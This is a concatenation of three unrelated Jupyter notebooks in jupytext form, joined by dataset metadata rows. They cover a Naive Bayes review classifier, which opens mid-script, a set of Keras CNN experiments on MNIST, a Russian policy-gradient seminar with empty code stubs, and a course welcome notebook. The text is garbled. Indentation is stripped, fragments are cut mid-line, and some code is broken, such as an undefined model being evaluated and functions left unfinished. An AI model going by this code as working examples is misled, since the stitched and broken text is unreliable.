from nltk.corpus import stopwords
from nltk.stem.porter import PorterStemmer
corpus = []
for i in range(0, 1000):
review = re.sub('[^a-zA-Z]', ' ', dataset['Review'][i])
review = review.lower()
review = review.split()
ps = PorterStemmer()
review = [ps.stem(word) for word in review if not word in set(stopwords.words('english'))]
review = ' '.join(review)
corpus.append(review)
#Creating bag of word model
from sklearn.feature_extraction.text import CountVectorizer
cv = CountVectorizer(max_features = 1500)
X = cv.fit_transform(corpus).toarray()
y = dataset.iloc[:, 1].values
X,y
# +
# splitting the dataset into training and test set
from sklearn.cross_validation import train_test_split
X_train,X_test, y_train, y_test = train_test_split(X, y, test_size = 0.20, random_state = 0)
#Fitting Naive Bayes model into the Training and Test set
from sklearn.naive_bayes import GaussianNB
classifier = GaussianNB()
classifier.fit(X_train, y_train)
y_pred = classifier.predict(X_test)
from sklearn.metrics import confusion_matrix
cm = confusion_matrix(y_test, y_pred)
# -
cm
padding and dropout)
# - ploting loss with each epoch of model
# - Overall Summary (Conclusion) .
# <hr>
# + [markdown] colab_type="text" id="xQkqyk1fTioQ"
# <div style="text-align:center"><span style="color:green; font-family:Georgia; font-size:2em;">Applying Various CNN Networks on MNIST Dataset </span><div>
# + [markdown] colab_type="text" id="x_eYSLk-7Ra0"
# ### Model 1 : 2 Layer Architecture + kernel (3, 3) + relu + Adadelta + MaxPooling(2, 2) + Dropout(0.25)
# + colab={"base_uri": "https://localhost:8080/", "height": 68} colab_type="code" id="lZkWneXnTc1I" outputId="85e7cee1-2f5e-4c40-a907-d686a8913472"
# Credits: https://github.com/keras-team/keras/blob/master/examples/mnist_cnn.py
import warnings
warnings.filterwarnings("ignore")
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import tensorflow as tf
import keras
from keras.datasets import mnist
from keras.models import Sequential
from keras.layers import Dense, Dropout, Flatten, Activation
from keras.layers import Conv2D, MaxPooling2D
from keras import backend as K
import seaborn as sns
from keras import regularizers
batch_size = 128
num_classes = 10
epochs = 12
# input image dimensions
img_rows, img_cols = 28, 28
# the data, split between train and test sets
(x_train, y_train), (x_test, y_test) = mnist.load_data()
if K.image_data_format() == 'channels_first':
x_train = x_train.reshape(x_train.shape[0], 1, img_rows, img_cols)
x_test = x_test.reshape(x_test.shape[0], 1, img_rows, img_cols)
input_shape = (1, img_rows, img_cols)
else:
x_train = x_train.reshape(x_train.shape[0], img_rows, img_cols, 1)
x_test = x_test.reshape(x_test.shape[0], img_rows, img_cols, 1)
input_shape = (img_rows, img_cols, 1)
x_train = x_train.astype('float32')
x_test = x_test.astype('float32')
x_train /= 255
x_test /= 255
print('x_train shape:', x_train.shape)
print(x_train.shape[0], 'train samples')
print(x_test.shape[0], 'test samples')
# convert class vectors to binary class matrices
y_train = keras.utils.to_categorical(y_train, num_classes)
y_test = keras.utils.to_categorical(y_test, num_classes)
# + colab={"base_uri": "https://localhost:8080/", "height": 649} colab_type="code" id="sTHpBLEM6t1B" outputId="ba386ffa-4fac-458b-d007-aef2c6110e23"
# Model 1 : 2 Layer Architecture + kernel (3, 3) + relu + Adadelta + MaxPooling(2, 2) + Dropout(0.25)
model = Sequential()
model.add(Conv2D(32, kernel_size=(3, 3),kernel_regularizer=regularizers.l2(0.01),activation='relu',input_shape=input_shape))
model.add(Conv2D(64, (3, 3), activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.25))
model.add(Flatten())
model.add(Dense(128, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss=keras.losses.categorical_crossentropy,optimizer=keras.optimizers.Adadelta(),metrics=['accuracy'])
history = model.fit(x_train, y_train,batch_size=batch_size,epochs=epochs,verbose=1,validation_data=(x_test, y_test))
score = model.evaluate(x_test, y_test, verbose=1)
score_train = model.evaluate(x_train, y_train, verbose=1)
print('train loss', score_train[0])
print('train accuracy:', score_train[1])
print('Test loss:', score[0])
print('Test accuracy:', score[1])
# + colab={"base_uri": "https://localhost:8080/", "height": 279} colab_type="code" id="2GBW72emXa8s" outputId="b9701102-98ff-4c50-b7ab-b526230e3302"
# %matplotlib notebook
# %matplotlib inline
import matplotlib.pyplot as plt
import numpy as np
import time
# https://gist.github.com/greydanus/f6eee59eaf1d90fcb3b534a25362cea4
# https://stackoverflow.com/a/14434334
# This function is used to update the plots for each epoch and error
def plt_dynamic(x, vy, ty, ax, colors=['b']):
ax.plot(x, vy, 'b', label="Validation Loss")
ax.plot(x, ty, 'r', label="Train Loss")
plt.legend()
plt.grid()
fig.canvas.draw()
# ploting loss with epoch of model
fig,ax = plt.subplots(1,1)
ax.set_xlabel('epoch') ; ax.set_ylabel('Categorical Crossentropy Loss')
# list of epoch numbers
x = list(range(1,epochs+1))
vy = history.history['val_loss']
ty = history.history['loss']
plt_dynamic(x, vy, ty, ax)
# + [markdown] colab_type="text" id="j7DS3vh7U1n2"
# ### Model_2 : 3Layer Architecture + kernel (5, 5) + relu + Adadelta + MaxPooling(2, 2) + Dropout(0.25)
# + colab={"base_uri": "https://localhost:8080/", "height": 527} colab_type="code" id="sKnPR4uXU0T-" outputId="42f512b4-4fc1-48cd-a39b-f48c6f479792"
# Model_2 : 3Layer Architecture + kernel (5, 5) + relu + Adadelta + MaxPooling(2, 2) + Dropout(0.25)
# %%time
model_2 = Sequential()
model_2.add(Conv2D(32, kernel_size=(5, 5),kernel_regularizer=regularizers.l2(0.01),activation='relu',input_shape=input_shape))
model_2.add(Conv2D(64, (5, 5), activation='relu', kernel_regularizer=regularizers.l2(0.01),))
model_2.add(MaxPooling2D(pool_size=(2, 2)))
model_2.add(Dropout(0.25))
model_2.add(Conv2D(128, (5, 5), activation='relu', kernel_regularizer=regularizers.l2(0.01),))
model_2.add(MaxPooling2D(pool_size=(2, 2)))
model_2.add(Dropout(0.25))
model_2.add(Flatten())
model_2.add(Dense(254, activation='relu'))
model_2.add(Dropout(0.5))
model_2.add(Dense(num_classes, activation='softmax'))
model_2.compile(loss=keras.losses.categorical_crossentropy,optimizer=keras.optimizers.Adadelta(),metrics=['accuracy'])
history_2 = model_2.fit(x_train, y_train,batch_size=batch_size,epochs=epochs,verbose=1,validation_data=(x_test, y_test))
score_2 = model_2.evaluate(x_test, y_test, verbose=1)
print('Test loss:', score_2[0])
print('Test accuracy:', score_2[1])
# + colab={"base_uri": "https://localhost:8080/", "height": 283} colab_type="code" id="bOVxhj1WU2LL" outputId="f8ca6b5d-d09f-4df8-a42c-95949517f1fe"
# ploting loss with each epoch of model2
fig, ax=plt.subplots(1,1)
ax.set_xlabel('epoch'); ax.set_ylabel('Categorical Crossentropy Loss')
x = list(range(1,epochs+1)) # List of epoch Numbers
vy = history_2.history['val_loss']
ty = history_2.history['loss']
plt_dynamic(x, vy, ty, ax)
# + [markdown] colab_type="text" id="Hk1Kh_nQee7v"
# ### Model_3: 3Layer Architecture + kernel (7, 7) + relu + Adam + MaxPooling(2, 2) + padding(same) + with out Dropout
# + colab={"base_uri": "https://localhost:8080/", "height": 493} colab_type="code" id="sT_sqZ3Me7W3" outputId="8984e701-874b-484c-90c0-ba54fadcc684"
# Model_3: 3Layer Architecture + kernel (7, 7) + relu + Adam + MaxPooling(2, 2) + padding(same) + with out Dropout
# %%time
model_3 = Sequential()
model_3.add(Conv2D(32,kernel_size=(7, 7),padding='same', kernel_regularizer=regularizers.l2(0.01),activation='relu',input_shape=input_shape))
model_3.add(MaxPooling2D(pool_size=(2, 2)))
model_3.add(Conv2D(64, kernel_size=(7,7),activation='relu'))
model_3.add(Conv2D(128, kernel_size=(7, 7), activation='relu'))
model_3.add(MaxPooling2D(pool_size=(2,2)))
model_3.add(Flatten())
model_3.add(Dense(254, activation='relu'))
model_3.add(Dense(num_classes, activation='softmax'))
model_3.compile(optimizer='adam', loss='categorical_crossentropy',metrics=['accuracy'])
history_3= model_3.fit(x_train, y_train, batch_size=batch_size,epochs=epochs,verbose=1,validation_data=(x_test, y_test))
score_3 = model_3.evaluate(x_test,y_test, verbose=1)
print('Test loss:', score_3[0])
print('Test accuracy:', score_3[1])
# + colab={"base_uri": "https://localhost:8080/", "height": 279} colab_type="code" id="jV_A3zhJe9MD" outputId="70744cce-272e-469f-fba2-e06c51e4f1ca"
# ploting loss with each epoch of mode3
fig, ax=plt.subplots(1,1)
ax.set_xlabel('epoch'); ax.set_ylabel('Categorical Crossentropy Loss')
x = list(range(1,epochs+1)) # List of epoch Numbers
vy = history_3.history['val_loss']
ty = history_3.history['loss']
plt_dynamic(x, vy, ty, ax)
# + [markdown] colab_type="text" id="h5PAFlN5e_7o"
# ### Model E1(Experiment1) = 3Layer Architecture + kernel (9, 9) + relu + adam + L2 reg + MaxPooling + padding(same) + Dropout(0.3)
# + colab={"base_uri": "https://localhost:8080/", "height": 595} colab_type="code" id="4aMEkkAuRKv3" outputId="0b851950-a596-4a5e-ad45-5cc49d83e6f8"
# Model E1(Experiment1) = 3Layer Architecture + kernel (9, 9) + relu + adam + L2 reg + MaxPooling + padding(same) + Dropout(0.3
# %%time
batch_size_E = 150
num_classes_E = 10
epochs_E = 15
model_E1 = Sequential()
model_E1.add(Conv2D(32,kernel_size=(9, 9),padding='same', kernel_regularizer=regularizers.l2(0.01),activation='relu',input_shape=input_shape))
model_E1.add(MaxPooling2D(pool_size=(2, 2)))
model_E1.add(Dropout(0.3))
model_E1.add(Conv2D(64, kernel_size=(9,9),padding='same',activation='relu'))
model_E1.add(MaxPooling2D(pool_size=(2, 2)))
model_E1.add(Dropout(0.3))
model_E1.add(Conv2D(128, kernel_size=(9, 9),padding='same', activation='relu'))
model_E1.add(MaxPooling2D(pool_size=(2,2)))
model_E1.add(Flatten())
model_E1.add(Dense(254, activation='relu'))
model_E1.add(Dense(num_classes_E, activation='softmax'))
model_E1.compile(optimizer='adam', loss='categorical_crossentropy',metrics=['accuracy'])
history= model_E1.fit(x_train, y_train, batch_size=batch_size_E,epochs=epochs_E,verbose=1,validation_data=(x_test, y_test))
score_E1 = model_E1.evaluate(x_test,y_test, verbose=1)
# + colab={"base_uri": "https://localhost:8080/", "height": 51} colab_type="code" id="GixlMY8C9m42" outputId="d6675f4c-a0e5-492e-d99d-d4a7ad40d15f"
print('Test loss:', score_E1[0])
print('Test accuracy:', score_E1[1])
# + colab={"base_uri": "https://localhost:8080/", "height": 279} colab_type="code" id="zQ_Kpn5sfAaN" outputId="54181d88-4037-4246-8b8a-371d41470b39"
# ploting loss with each epoch of model_E1
fig, ax=plt.subplots(1,1)
ax.set_xlabel('epoch'); ax.set_ylabel('Categorical Crossentropy Loss')
x = list(range(1,epochs_E+1)) # List of epoch Numbers
vy = history.history['val_loss']
ty = history.history['loss']
plt_dynamic(x, vy, ty, ax)
# + [markdown] colab_type="text" id="lWCsX6IifAnS"
# ### Model_E2(Experiment2) = Single Layer Architecture + kernel (7, 7) + relu + Adadelta + MaxPooling(2,2) + padding + Dropout(0.3)
# + colab={"base_uri": "https://localhost:8080/", "height": 629} colab_type="code" id="cQLYz-VwfA0E" outputId="73a9971a-65c4-40a6-fae4-a9b6d10caf61"
# Model E2(Experiment2) = Single Layer Architecture + kernel (7, 7) + relu + Adadelta + MaxPooling(2,2) + padding + Dropout(0.3)
# %%time
from keras.layers import Activation
model_E2 = Sequential()
model_E2.add(Conv2D(64,kernel_size=(7, 7), activation='relu',input_shape=input_shape))
model_E2.add(MaxPooling2D(pool_size=(2, 2)))
model_E2.add(Dropout(0.3))
model_E2.add(Flatten())
model_E2.add(Dense(254, activation='relu'))
model_E2.add(Dense(num_classes_E, activation='softmax'))
model_E2.compile(optimizer=keras.optimizers.Adadelta(), loss='categorical_crossentropy',metrics=['accuracy'])
history= model_E2.fit(x_train, y_train, batch_size=batch_size_E,epochs=epochs_E,verbose=1,validation_data=(x_test, y_test))
score_E2 = model_3_conv_5L.evaluate(x_test,y_test, verbose=1)
print('Test loss:', score_E2[0])
print('Test accuracy:', score_E2[1])
# + colab={"base_uri": "https://localhost:8080/", "height": 279} colab_type="code" id="MIMQmaXGfA3P" outputId="2e76596a-3148-41ef-f6de-8b6e28b9944c"
# ploting loss with each epoch of model_E2
fig, ax = plt.subplots(1,1)
ax.set_xlabel('epoch'); ax.set_ylabel('Categorical Crossentropy')
x = list(range(1,epochs_E+1)) # List of epoch Numbers
vy = history.history['val_loss']
ty = history.history['loss']
plt_dynamic(x, vy, ty, ax)
# + [markdown] colab_type="text" id="zGDQVPIDfBDx"
# ### Model_E3(Experiment3) = 4Layer Architecture + kernel (11, 11) + relu + L2 Reg + Adam + MaxPooling(2, 2) + padding + Dropout(0.5)
# + colab={"base_uri": "https://localhost:8080/", "height": 629} colab_type="code" id="l0hWfqbYfBTE" outputId="528c154a-08b9-4a83-acee-c10b55ba1307"
# Model E3(Experiment3) = 4Layer Architecture + kernel (11, 11) + relu + L2 Reg + Adam + MaxPooling(2, 2) + padding + Dropout(0.5)
# %%time
model_E3 = Sequential()
model_E3.add(Conv2D(16,kernel_size=(11, 11),padding='same', kernel_regularizer=regularizers.l2(0.001),activation='relu',input_shape=input_shape))
model_E3.add(MaxPooling2D(pool_size=(2, 2)))
model_E3.add(Dropout(0.5))
model_E3.add(Conv2D(32, kernel_size=(11, 11), padding='same', kernel_regularizer=regularizers.l2(0.001), activation='relu'))
model_E3.add(Conv2D(64, kernel_size=(11,11),padding='same',activation='relu'))
model_E3.add(MaxPooling2D(pool_size=(2, 2)))
model_E3.add(Dropout(0.5))
model_E3.add(Conv2D(128, kernel_size=(11, 11),padding='same', activation='relu'))
model_E3.add(MaxPooling2D(pool_size=(2,2)))
model_E3.add(Dropout(0.5))
model_E3.add(Flatten())
model_E3.add(Dense(254,activation='relu'))
model_E3.add(Dense(num_classes, activation='softmax'))
model_E3.compile(optimizer='adam', loss='categorical_crossentropy',metrics=['accuracy'])
history= model_E3.fit(x_train, y_train, batch_size=batch_size_E,epochs=epochs_E,verbose=1,validation_data=(x_test, y_test))
score_E3 = model_E3.evaluate(x_test,y_test, verbose=1)
print('test loss :', score_E3[0])
print('test accuracy :', score_E3[1])
# + colab={"base_uri": "https://localhost:8080/", "height": 279} colab_type="code" id="ag538tLJfBu5" outputId="ac8fc9aa-6e2d-41dd-eaa8-6d060f1da0db"
# ploting loss with epoch of model_E3
fig,ax = plt.subplots(1,1)
ax.set_xlabel('epoch') ; ax.set_ylabel('Categorical Crossentropy Loss')
# list of epoch numbers
x = list(range(1,epochs_E+1))
vy = history.history['val_loss']
ty = history.history['loss']
plt_dynamic(x, vy, ty, ax)
# + colab={"base_uri": "https://localhost:8080/", "height": 295} colab_type="code" id="-Pum-9PEfBsx" outputId="d958707b-1598-4b06-8b97-0a0df90688f3"
# ploting Train Accuracy , validation Accuracy , train loss , validation loss
import matplotlib.pyplot as plt
plt.plot(history.history["acc"])
plt.plot(history.history['val_acc'])
plt.plot(history.history['loss'])
plt.plot(history.history['val_loss'])
plt.grid()
plt.title("model accuracy")
plt.ylabel("Accuracy")
plt.xlabel("Epoch")
plt.legend(["Train Accuracy","Validation Accuracy","Train loss","Validation Loss"])
plt.show()
# + [markdown] colab_type="text" id="eFT_bbmafB6B"
# ### Model_4(Experiment4) : 2Layer Architecture + Kernel(3, 3) with relu followed by maxpooling (2, 2), padding, L2 reg, Adam, and with out Dropout
# + colab={"base_uri": "https://localhost:8080/", "height": 629} colab_type="code" id="Q8ABr8-kfBQ4" outputId="4d2a374e-9b62-4e30-f7ed-5f1235907068"
# Model_4(Experiment4) : 2Layer Architecture + Kernel(3, 3) with relu followed by maxpooling (2, 2), padding, L2 reg, Adam, and with out Dropout
# %%time
model_E4 = Sequential()
model_E4.add(Conv2D(64,kernel_size=(3, 3),padding='same', kernel_regularizer=regularizers.l2(0.001),activation='relu',input_shape=input_shape))
model_E4.add(MaxPooling2D(pool_size=(2, 2)))
model_E4.add(Conv2D(128, kernel_size=(3, 3), activation='relu'))
model_E4.add(MaxPooling2D(pool_size=(2, 2)))
model_E4.add(Flatten())
model_E4.add(Dense(254,activation='relu'))
model_E4.add(Dense(num_classes, activation='softmax'))
model_E4.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])
history_E4 = model_E4.fit(x_train, y_train, verbose=1, batch_size=batch_size_E, epochs=epochs_E, validation_data=(x_test, y_test))
score_E4 = model_E4.evaluate(x_test, y_test, verbose=1,)
print('Test Loss:', score_E4[0])
print('Test Accuracy:', score_E4[1])
# + colab={"base_uri": "https://localhost:8080/", "height": 295} colab_type="code" id="4PLvQVu532cP" outputId="ed0fbbc0-38f2-4c01-d00d-8a69bbde60a7"
# ploting loss with epoch of model_E4
import matplotlib.pyplot as plt
plt.plot(history_E4.history['loss'])
plt.plot(history_E4.history['val_loss'])
plt.grid()
plt.title('loss with epoch of model_E4')
plt.xlabel('epoch')
plt.ylabel('Categorical_Croosentropy')
plt.legend(['Train loss', 'Validation loss'])
plt.show()
# + colab={} colab_type="code" id="jqA9E-4DsXvy"
from prettytable import PrettyTable
p = PrettyTable()
p.field_names = ['Model', 'Architec',"batch",'epochs','kernel','MaxPool','Activation', "Optimizer",'Regulrize',
'Dropout','Val_loss', 'Val_Acc' ]
p.add_row(["Model_1","2 Layer", 128, 12, "3, 3", "2, 2", "relu", "Adadelta", "L2 (0.01)", 0.25, 0.029, 0.9916 ])
p.add_row(["Model_2","3 Layer", 128, 12, "5, 5", "2, 2", "relu", "Adadelta", "L2 (0.01)", 0.25, 2.698, 0.9390 ])
p.add_row(["Model_3","3 Layer", 128, 12, "7, 7", "2, 2", "relu", "Adam", "L2 (0.01)", "--", 0.0364, 0.9925 ])
p.add_row(["Model_E1","3 Layer",150, 15, "9, 9", "2, 2", "relu", "Adam", "L2 (0.01)", 0.3, 0.0403, 0.9906 ])
p.add_row(["Model_E2","1 Layer",150, 15, "7, 7", "2, 2", "relu", "Adadelta", "--", 0.3, 0.0300, 0.9913 ])
p.add_row(["Model_E3","4 Layer",150, 15, "11, 11","2, 2", "relu", "Adam", "L2 (0.001)", 0.5, 0.0569, 0.9914 ])
p.add_row(["Model_E4","2 Layer",150, 15, "3, 3", "2, 2", "relu", "Adam", "L2 (0.001)", "--", 0.0356, 0.9909 ])
print(p)
# -
# # Conclusion : Overall Summary with Experiment
# * **Tried various models with diffrent hidden layer architecture and diffrent Approches (Kernel size,maxpooling,
# activation, optimizer, regularizer, padding and dropout)**
# * **L2 Regularization was helps to the model performence and it avoid's the model overfit.**
# * **All models took larger amount of computional power(worked with CPU).**
# * **For better model performence, the hidden layer size , batchsize, and epochs should be choose reasonably and it shouldn't be too hegh numbers and it shouldn't be low numbers based on the dataset size we have .**
# * **By experimenting with all diffrent apprroches to the model, loss and accutracy changes within reasonable limits.**
# * **CNN models works very well with large amount of layers and large kernel sizes also.**
# * **Overall CNN models works very well with heigh accuracy and low eroor loss on MNIST Dataset.**
#
# + [markdown] colab_type="text" id="dfBHPBmj_SML"
# <div style="text-align:center"><span style="color:green;fontfamily:Georgia; font-size:2em;">Thank You.</div></span>
#
# <nav style="text-align:center">
# <a href="https://www.linkedin.com/in/rameshbattuai/">**Sign Off RAMESH BATTU**</a></nav>
| 19,740 |
/part2_RL_2/Seminar_4_Policy_grad.ipynb
|
883d467e7eedd12f57cb57f65e2fcf2083d964fc
|
[] |
permissive
|
letimofeev/ml_mipt_dafe_major
|
https://github.com/letimofeev/ml_mipt_dafe_major
| 0 | 0 |
MIT
| 2020-09-25T16:35:27 | 2020-09-23T08:15:13 | null |
Jupyter Notebook
| false | false |
.py
| 68,254 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Семинар 4. Policy Gradients
# +
import gym
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.distributions import Categorical
# -
# ## Policy Gradients
# Мы будем обучать агента без явного отображения значения для каждой пары состояние-действие в среде. Будем обновлять политику на основе вознаграждения, связанного с каждым шагом. Агент может получить награду сразу за действие, или агент может получить награду позже, например, в конце эпизода.
# Мы применим метод под названием «Градиент политики Монте-Карло», который означает, что агент будет проходить весь эпизод, а затем обновлять нашу политику в зависимости от полученных наград.
#Hyperparameters
learning_rate = 0.01
G = 0.99
seed = 543
render = True
log_interval = 10
env = gym.make('CartPole-v1')
env.seed(seed)
torch.manual_seed(seed)
# ## Соберем нейронную сеть для апроксимации политики
# +
class Policy(nn.Module):
def __init__(self):
super(Policy, self).__init__()
# Соберем свою нейронку
def forward(self, x):
policy = Policy()
optimizer = optim.Adam(policy.parameters(), lr=learning_rate)
eps = np.finfo(np.float32).eps.item()
# -
# ## Select Action
# Функция select_action выбирает действие на основе распределения вероятностей нашей политики. Наша политика возвращает вероятность для каждого возможного действия в нашем пространстве действий (движение влево или вправо) в виде массива длиной два, например [0,7, 0,3]. Затем мы выбираем действие на основе этих вероятностей, записываем историю действий и возвращаем действие актора.
def select_action(state):
# Читаем состояние
# Предсказываем вероятности
# Выбираем действие на основе вероятностей (например e-greedy)
return action.item()
# ## Обновление политики
# Мы обновляем нашу политику играя эпизоды. Выигрыш определяется как ожидаемый доход от выполнения действия $ a $ в состоянии $ s $ в соответствии с политикой $ \pi $.
#
# Мы знаем, что за каждый шаг продолжения симуляции мы получаем вознаграждение в размере 1. Мы можем использовать это для вычисления градиента политики на каждом временном шаге, где $ r $ - это вознаграждение для конкретной пары состояние-действие. Вместо мгновенного вознаграждения $ r $ мы используем долгосрочное вознаграждение $ v_{t} $, где $ v_{t} $ - это дисконтированная сумма всех будущих вознаграждений на протяжении всего эпизода. Таким образом, чем "дольше" эпизод длится, тем "больше" награда за конкретную пару состояние-действие в настоящем. $ v_{t} $ тогда,
#
# $$ v_{t} = \sum_{k=0}^{N} \gamma^{k}r_{t+k} $$
#
# где $ \gamma $ - коэффициент дисконтирования (0,99). Например, если эпизод длится 5 шагов, награда за каждый шаг будет [4,90, 3,94, 2,97, 1,99, 1].
# Затем мы масштабируем наш вектор вознаграждения, вычитая среднее значение из каждого элемента и масштабируя до единичной дисперсии путем деления на стандартное отклонение (нормировка).
#
# Затем мы передадим нашу историю политик, умноженную на наши вознаграждения, нашему оптимизатору и обновим веса нашей нейронной сети, используя стохастический градиентный спуск. Это должно увеличить вероятность действий, которые принесли нашему агенту более крупное вознаграждение.
#
#
def update_policy():
R = 0
policy_loss = []
returns = []
# Дисконтируем (уменьшаем) награды для каждого шага
for r in policy.rewards[::-1]:
# Нормируем награду
# Считаем "ошибку"
for log_prob, R in zip(policy.saved_log_probs, returns):
# Обновляем веса сети
optimizer.zero_grad()
policy_loss = torch.cat(policy_loss).sum()
policy_loss.backward()
optimizer.step()
del policy.rewards[:]
del policy.saved_log_probs[:]
# ## Training
# Наш основной цикл обучения политике. Для каждого шага в эпизоде мы выбираем действие, делаем шаг по среде и записываем полученное новое состояние и награду. Мы вызываем update_policy() в конце каждого эпизода, чтобы передать историю эпизодов в нашу нейронную сеть и улучшить нашу политику.
def main(episodes):
running_reward = 10
reward_history = []
# Цикл по эпизодам
for i_episode in range(episodes):
state = env.reset()
ep_reward = 0
# Цикл по одному эпизоду
# Ограничивае число итераций для обучения
for t in range(1, 10000):
reward_history.append(ep_reward)
# Обновляем среднюю награду
# Обновляем политику
if i_episode % log_interval == 0:
print('Episode {}\tПоследняя награда: {:.2f}\tСредняя награда: {:.2f}'.format(
i_episode, ep_reward, running_reward))
if running_reward > env.spec.reward_threshold:
print("Solved! Running reward is now {} and "
"the last episode runs to {} time steps!".format(running_reward, t))
break
return reward_history
# ## Run Model
episodes = 50
reward_history = main(episodes)
env.spec.reward_threshold
env.reset()
env.close()
# ## Plot Results
# +
window = int(episodes/5)
fig, ((ax1), (ax2)) = plt.subplots(2, 1, sharey=True, figsize=[9,9]);
rolling_mean = pd.Series(reward_history).rolling(window).mean()
std = pd.Series(reward_history).rolling(window).std()
ax1.plot(rolling_mean)
ax1.fill_between(range(len(reward_history)),rolling_mean-std, rolling_mean+std, color='orange', alpha=0.2)
ax1.set_title('Episode Length Moving Average ({}-episode window)'.format(window))
ax1.set_xlabel('Episode'); ax1.set_ylabel('Episode Length')
ax2.plot(reward_history)
ax2.set_title('Episode Length')
ax2.set_xlabel('Episode'); ax2.set_ylabel('Episode Length')
fig.tight_layout(pad=2)
plt.show()
#fig.savefig('results.png')
| 6,097 |
/welcome.ipynb
|
ba2080b0dc5c697d96294e0666e076b4f572598b
|
[
"MIT"
] |
permissive
|
georgetown-analytics/XBUS-500-01.Foundations-of-Data-Science
|
https://github.com/georgetown-analytics/XBUS-500-01.Foundations-of-Data-Science
| 17 | 12 |
MIT
| 2023-08-16T20:36:16 | 2022-08-12T02:52:39 |
Jupyter Notebook
|
Jupyter Notebook
| false | false |
.py
| 3,083 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ## Welcome to Jupyter notebook!
#
# Hopefully you made it here by following the instructions in the readme file. We will be using notebooks a lot throughout the course.
#
# Notebooks let you run code and add things, like this block of text. Double click on this text. You should get a markdown cell that you can edit.
#
# Type something here:
# We can also run python code in notebooks.
#
# Run the following cell. (Don't forget to check the alt text!)
import antigravity
# :-)
#
# (If nothing happened, look in the top right corner and verify it says "Python 3" not "Python 2".
#
# Now try the following blocks of code.
s = "Hello world"
print (s)
print (s[::-1])
# If there is a problem with your code, error messages will also be displayed.
print s
# You will be expected to understand basic navigation of the notebook. You are also encouraged to add cells and try out different pieces of code when we are going though labs. For more information on using notebooks you are highly encouraged to go through the [tutorial](https://jupyter-notebook-beginner-guide.readthedocs.io/en/latest/what_is_jupyter.html) available online.
#
# You can also take a look at this [example data science notebook](https://github.com/rhiever/Data-Analysis-and-Machine-Learning-Projects/tree/master/example-data-science-notebook). It is a good example of how notebooks are used and will give you an idea of where this course is going.
#
#
| 1,698 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.